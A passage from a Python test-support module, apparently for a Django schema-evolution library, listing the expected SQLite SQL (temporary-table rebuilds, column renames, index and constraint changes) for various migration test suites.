' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel"'
' ("custom_db_col_name_indexed");'
% generate_index_name('tests_testmodel',
'custom_db_col_name_indexed',
'int_field_named_indexed'),
'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
% generate_index_name('tests_testmodel', 'fk_field_id',
'fk_field'),
],
'RenameColumnWithTableNameModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "renamed_field" integer NOT NULL,'
' "custom_db_col_name" integer NOT NULL,'
' "custom_db_col_name_indexed" integer NOT NULL,'
' "fk_field_id" integer NOT NULL'
' REFERENCES "tests_renameanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE"'
' ("id", "char_field", "renamed_field", "custom_db_col_name",'
' "custom_db_col_name_indexed", "fk_field_id")'
' SELECT "id", "char_field", "int_field",'
' "custom_db_col_name", "custom_db_col_name_indexed",'
' "fk_field_id"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel"'
' ("custom_db_col_name_indexed");'
% generate_index_name('tests_testmodel',
'custom_db_col_name_indexed',
'int_field_named_indexed'),
'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
% generate_index_name('tests_testmodel', 'fk_field_id',
'fk_field'),
],
'RenameForeignKeyColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("int_field" integer NOT NULL,'
' "char_field" varchar(20) NOT NULL,'
' "custom_db_col_name" integer NOT NULL,'
' "custom_db_col_name_indexed" integer NOT NULL,'
' "renamed_field_id" integer NOT NULL'
' REFERENCES "tests_renameanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED,'
' "id" integer NOT NULL UNIQUE PRIMARY KEY);',
'INSERT INTO "TEMP_TABLE"'
' ("renamed_field", "char_field", "int_field",'
' "custom_db_col_name_indexed", "fk_field_id", "id")'
' SELECT "custom_db_col_name", "char_field", "int_field",'
' "custom_db_col_name_indexed", "fk_field_id", "id"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" '
' ("custom_db_col_name_indexed");'
% generate_index_name('tests_testmodel',
'custom_db_col_name_indexed'),
'CREATE INDEX "%s" ON "tests_testmodel" ("renamed_field_id");'
% generate_index_name('tests_testmodel', 'renamed_field_id'),
],
'RenameNonDefaultColumnNameModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "renamed_field" integer NOT NULL,'
' "custom_db_col_name_indexed" integer NOT NULL,'
' "fk_field_id" integer NOT NULL'
' REFERENCES "tests_renameanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE"'
' ("id", "char_field", "int_field", "renamed_field",'
' "custom_db_col_name_indexed", "fk_field_id")'
' SELECT "id", "char_field", "int_field",'
' "custom_db_col_name", "custom_db_col_name_indexed",'
' "fk_field_id"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel"'
' ("custom_db_col_name_indexed");'
% generate_index_name('tests_testmodel',
'custom_db_col_name_indexed',
'int_field_named_indexed'),
'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
% generate_index_name('tests_testmodel', 'fk_field_id',
'fk_field'),
],
'RenameNonDefaultColumnNameToNonDefaultNameModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "non-default_column_name" integer NOT NULL,'
' "custom_db_col_name_indexed" integer NOT NULL,'
' "fk_field_id" integer NOT NULL'
' REFERENCES "tests_renameanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE"'
' ("id", "char_field", "int_field", "non-default_column_name",'
' "custom_db_col_name_indexed", "fk_field_id")'
' SELECT "id", "char_field", "int_field",'
' "custom_db_col_name", "custom_db_col_name_indexed",'
' "fk_field_id"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel"'
' ("custom_db_col_name_indexed");'
% generate_index_name('tests_testmodel',
'custom_db_col_name_indexed',
'int_field_named_indexed'),
'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
% generate_index_name('tests_testmodel', 'fk_field_id',
'fk_field'),
],
'RenameNonDefaultColumnNameToNonDefaultNameAndTableModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "non-default_column_name2" integer NOT NULL,'
' "custom_db_col_name_indexed" integer NOT NULL,'
' "fk_field_id" integer NOT NULL'
' REFERENCES "tests_renameanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE"'
' ("id", "char_field", "int_field",'
' "non-default_column_name2", "custom_db_col_name_indexed",'
' "fk_field_id")'
' SELECT "id", "char_field", "int_field",'
' "custom_db_col_name", "custom_db_col_name_indexed",'
' "fk_field_id"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel"'
' ("custom_db_col_name_indexed");'
% generate_index_name('tests_testmodel',
'custom_db_col_name_indexed',
'int_field_named_indexed'),
'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
% generate_index_name('tests_testmodel', 'fk_field_id',
'fk_field'),
],
'RenameColumnCustomTableModel': [
'CREATE TABLE "TEMP_TABLE"'
' ("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "renamed_field" integer NOT NULL,'
' "alt_value" varchar(20) NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("id", "renamed_field", "alt_value")'
' SELECT "id", "value", "alt_value"'
' FROM "custom_rename_table_name";',
'DROP TABLE "custom_rename_table_name";',
'ALTER TABLE "TEMP_TABLE"'
' RENAME TO "custom_rename_table_name";',
],
})
return mappings
def sql_mutation(connection):
"""SQL test statements for the SQLMutationTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
return {
'AddFirstTwoFields': [
'ALTER TABLE "tests_testmodel"'
' ADD COLUMN "added_field1" integer NULL;',
'ALTER TABLE "tests_testmodel"'
' ADD COLUMN "added_field2" integer NULL;',
],
'AddThirdField': [
'ALTER TABLE "tests_testmodel"'
' ADD COLUMN "added_field3" integer NULL;',
],
'SQLMutationOutput': [
'ALTER TABLE "tests_testmodel"'
' ADD COLUMN "added_field1" integer NULL;',
'ALTER TABLE "tests_testmodel"'
' ADD COLUMN "added_field2" integer NULL;',
'ALTER TABLE "tests_testmodel"'
' ADD COLUMN "added_field3" integer NULL;',
],
}
def generics(connection):
"""SQL test statements for the GenericRelationsTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
generate_index_name = make_generate_index_name(connection)
return {
'DeleteColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "int_field" integer NOT NULL,'
' "content_type_id" integer NOT NULL'
' REFERENCES "django_content_type" ("id")'
' DEFERRABLE INITIALLY DEFERRED,'
' "object_id" integer unsigned NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("id", "int_field", "content_type_id", "object_id")'
' SELECT "id", "int_field", "content_type_id", "object_id"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("content_type_id");'
% generate_index_name('tests_testmodel', 'content_type_id',
'content_type'),
'CREATE INDEX "%s" ON "tests_testmodel" ("object_id");'
% generate_index_name('tests_testmodel', 'object_id'),
],
}
def unique_together(connection):
"""SQL test statements for the ChangeMetaUniqueTogetherTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
generate_unique_constraint_name = \
make_generate_unique_constraint_name(connection)
mappings = {
'setting_from_empty': [
'CREATE UNIQUE INDEX "%s"'
' ON "tests_testmodel" ("int_field1", "char_field1");'
% generate_unique_constraint_name('tests_testmodel',
['int_field1', 'char_field1']),
],
'append_list': [
'CREATE UNIQUE INDEX "%s"'
' ON "tests_testmodel" ("int_field2", "char_field2");'
% generate_unique_constraint_name('tests_testmodel',
['int_field2', 'char_field2']),
],
'set_remove': [
'CREATE UNIQUE INDEX "%s"'
' ON "tests_testmodel" ("int_field1", "char_field1");'
% generate_unique_constraint_name('tests_testmodel',
['int_field1', 'char_field1']),
],
'ignore_missing_indexes': [
'CREATE UNIQUE INDEX "%s"'
' ON "tests_testmodel" ("char_field1", "char_field2");'
% generate_unique_constraint_name('tests_testmodel',
['char_field1', 'char_field2']),
],
'upgrade_from_v1_sig': [
'CREATE UNIQUE INDEX "%s"'
' ON "tests_testmodel" ("int_field1", "char_field1");'
% generate_unique_constraint_name('tests_testmodel',
['int_field1', 'char_field1']),
],
}
if django_version >= (1, 9):
# Django >= 1.9
mappings.update({
'replace_list': [
'DROP INDEX "%s";'
% generate_unique_constraint_name(
'tests_testmodel',
['int_field1', 'char_field1']),
'CREATE UNIQUE INDEX "%s"'
' ON "tests_testmodel" ("int_field2", "char_field2");'
% generate_unique_constraint_name(
'tests_testmodel',
['int_field2', 'char_field2']),
],
'removing': [
'DROP INDEX "%s";'
% generate_unique_constraint_name(
'tests_testmodel',
['int_field1', 'char_field1']),
],
})
else:
# Django < 1.9
mappings.update({
'replace_list': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "char_field1" varchar(20) NOT NULL,'
' "char_field2" varchar(40) NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("id", "int_field1", "int_field2", "char_field1",'
' "char_field2")'
' SELECT "id", "int_field1", "int_field2", "char_field1",'
' "char_field2" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE UNIQUE INDEX "%s"'
' ON "tests_testmodel" ("int_field2", "char_field2");'
% generate_unique_constraint_name(
'tests_testmodel',
['int_field2', 'char_field2']),
],
'removing': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "char_field1" varchar(20) NOT NULL,'
' "char_field2" varchar(40) NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("id", "int_field1", "int_field2", "char_field1",'
' "char_field2")'
' SELECT "id", "int_field1", "int_field2", "char_field1",'
' "char_field2" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
})
return mappings
def index_together(connection):
"""SQL test statements for the ChangeMetaIndexTogetherTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
generate_index_name = make_generate_index_name(connection)
return {
'setting_from_empty': [
'CREATE INDEX "%s"'
' ON "tests_testmodel" ("int_field1", "char_field1");'
% generate_index_name('tests_testmodel',
['int_field1', 'char_field1'],
index_together=True),
],
'replace_list': [
'DROP INDEX "%s";'
% generate_index_name('tests_testmodel',
['int_field1', 'char_field1'],
index_together=True),
'CREATE INDEX "%s"'
' ON "tests_testmodel" ("int_field2", "char_field2");'
% generate_index_name('tests_testmodel',
['int_field2', 'char_field2'],
index_together=True),
],
'append_list': [
'CREATE INDEX "%s"'
' ON "tests_testmodel" ("int_field2", "char_field2");'
% generate_index_name('tests_testmodel',
['int_field2', 'char_field2'],
index_together=True),
],
'removing': [
'DROP INDEX "%s";'
% generate_index_name('tests_testmodel',
['int_field1', 'char_field1'],
index_together=True),
],
'ignore_missing_indexes': [
'CREATE INDEX "%s"'
' ON "tests_testmodel" ("char_field1", "char_field2");'
% generate_index_name('tests_testmodel',
['char_field1', 'char_field2'],
index_together=True),
],
}
def constraints(connection):
"""SQL test statements for the ChangeMetaConstraintsTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
return {
'append_list': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "char_field1" varchar(20) NOT NULL,'
' "char_field2" varchar(40) NOT NULL,'
' CONSTRAINT "base_check_constraint"'
' CHECK ("char_field1" LIKE \'test%\' ESCAPE \'\\\'),'
' CONSTRAINT "base_unique_constraint_plain"'
' UNIQUE ("int_field1", "char_field1"),'
' CONSTRAINT "new_unique_constraint"'
' UNIQUE ("int_field2", "int_field1"),'
' CONSTRAINT "new_check_constraint"'
' CHECK ("int_field1" >= 100));',
'INSERT INTO "TEMP_TABLE"'
' ("id", "int_field1", "int_field2", "char_field1", "char_field2")'
' SELECT "id", "int_field1", "int_field2", "char_field1",'
' "char_field2" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'removing': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "char_field1" varchar(20) NOT NULL,'
' "char_field2" varchar(40) NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("id", "int_field1", "int_field2", "char_field1", "char_field2")'
' SELECT "id", "int_field1", "int_field2", "char_field1",'
' "char_field2" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'replace_list': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "char_field1" varchar(20) NOT NULL,'
' "char_field2" varchar(40) NOT NULL,'
' CONSTRAINT "new_check_constraint"'
' CHECK ("char_field1" LIKE \'test%\' ESCAPE \'\\\'),'
' CONSTRAINT "new_unique_constraint_plain"'
' UNIQUE ("int_field1", "char_field1"));',
'INSERT INTO "TEMP_TABLE"'
' ("id", "int_field1", "int_field2", "char_field1", "char_field2")'
' SELECT "id", "int_field1", "int_field2", "char_field1",'
' "char_field2" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'setting_from_empty': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "char_field1" varchar(20) NOT NULL,'
' "char_field2" varchar(40) NOT NULL,'
' CONSTRAINT "new_check_constraint"'
' CHECK ("char_field1" LIKE \'test%\' ESCAPE \'\\\'),'
' CONSTRAINT "new_unique_constraint_plain"'
' UNIQUE ("int_field1", "int_field2"));',
'INSERT INTO "TEMP_TABLE"'
' ("id", "int_field1", "int_field2", "char_field1", "char_field2")'
' SELECT "id", "int_field1", "int_field2", "char_field1",'
' "char_field2" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
}
def indexes(connection):
"""SQL test statements for the ChangeMetaIndexesTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
generate_index_name = make_generate_index_name(connection)
return {
'replace_list': [
'DROP INDEX "%s";'
% generate_index_name('tests_testmodel', ['int_field1'],
model_meta_indexes=True),
'DROP INDEX "my_custom_index";',
'CREATE INDEX "%s"'
' ON "tests_testmodel" ("int_field2");'
% generate_index_name('tests_testmodel', ['int_field2'],
model_meta_indexes=True),
],
'append_list': [
'CREATE INDEX "%s"'
' ON "tests_testmodel" ("int_field2");'
% generate_index_name('tests_testmodel', ['int_field2'],
model_meta_indexes=True),
],
'removing': [
'DROP INDEX "%s";'
% generate_index_name('tests_testmodel', ['int_field1'],
model_meta_indexes=True),
'DROP INDEX "my_custom_index";',
],
'ignore_missing_indexes': [
'CREATE INDEX "%s"'
' ON "tests_testmodel" ("int_field2");'
% generate_index_name('tests_testmodel', ['int_field2'],
model_meta_indexes=True),
],
'setting_from_empty': [
'CREATE INDEX "%s"'
' ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel',
['int_field1'],
model_meta_indexes=True),
'CREATE INDEX "my_custom_index"'
' ON "tests_testmodel" ("char_field1", "char_field2"%s);'
% DESC,
],
}
def preprocessing(connection):
"""SQL test statements for the PreprocessingTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
generate_index_name = make_generate_index_name(connection)
mappings = {
'add_change_field': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "added_field" varchar(50) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
' "added_field")'
' SELECT "my_id", "char_field", \'bar\' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'add_change_rename_field': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "renamed_field" varchar(50) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
' "renamed_field")'
' SELECT "my_id", "char_field", \'bar\' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'add_delete_add_field': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "added_field" integer NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
' "added_field")'
' SELECT "my_id", "char_field", 42 FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'add_delete_add_rename_field': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "renamed_field" integer NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
' "renamed_field")'
' SELECT "my_id", "char_field", 42 FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'add_rename_change_field': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "renamed_field" varchar(50) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
' "renamed_field")'
' SELECT "my_id", "char_field", \'bar\' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'add_rename_change_rename_change_field': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "renamed_field" varchar(50) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
' "renamed_field")'
' SELECT "my_id", "char_field", \'foo\' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'add_rename_field_with_db_column': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "added_field" varchar(50) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'add_field_rename_model': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "added_field_id" integer NULL'
' REFERENCES "tests_reffedpreprocmodel" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("added_field_id");'
% generate_index_name('tests_testmodel', 'added_field_id',
'added_field'),
],
'add_rename_field_rename_model': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "renamed_field_id" integer NULL'
' REFERENCES "tests_reffedpreprocmodel" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("renamed_field_id");'
% generate_index_name('tests_testmodel', 'renamed_field_id',
'renamed_field'),
],
'add_sql_delete': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "added_field" varchar(20) NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
' "added_field")'
' SELECT "my_id", "char_field", \'foo\' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'delete_char_field': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY);',
'INSERT INTO "TEMP_TABLE" ("my_id")'
' SELECT "my_id" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'rename_delete_model': [
'DROP TABLE "tests_testmodel";',
],
'noop': [],
}
if sqlite_version >= (3, 26):
mappings.update({
'change_rename_field': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "char_field" TO "renamed_field";',
],
'change_rename_change_rename_field': [
# Change char_field to length of 30 and allow NULL.
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(30) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
# Rename char_field to renamed_field.
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "char_field" TO "renamed_field";',
],
'rename_add_field': [
# Rename char_field to renamed_field.
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "char_field" TO "renamed_field";',
# Remove NULL from renamed_field.
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "renamed_field" varchar(20) NOT NULL,'
' "char_field" varchar(50) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
' SELECT "my_id", "renamed_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'rename_change_rename_change_field': [
# Rename char_field to renamed_field.
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "char_field" TO "renamed_field";',
# Set renamed_field to allow NULL and set length to 50.
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "renamed_field" varchar(50) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
' SELECT "my_id", "renamed_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'rename_rename_field': [
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "char_field" TO "renamed_field";',
],
})
else:
mappings.update({
'change_rename_field': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "renamed_field" varchar(20) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'change_rename_change_rename_field': [
# Change char_field to length of 30 and allow NULL.
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(30) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
# Rename char_field to renamed_field.
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "renamed_field" varchar(30) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'rename_add_field': [
# Rename char_field to renamed_field.
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "renamed_field" varchar(20) NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
# Remove NULL from renamed_field.
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "renamed_field" varchar(20) NOT NULL,'
' "char_field" varchar(50) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
' SELECT "my_id", "renamed_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'rename_change_rename_change_field': [
# Rename char_field to renamed_field.
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "renamed_field" varchar(20) NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
# Set renamed_field to allow NULL and set length to 50.
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "renamed_field" varchar(50) NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
' SELECT "my_id", "renamed_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
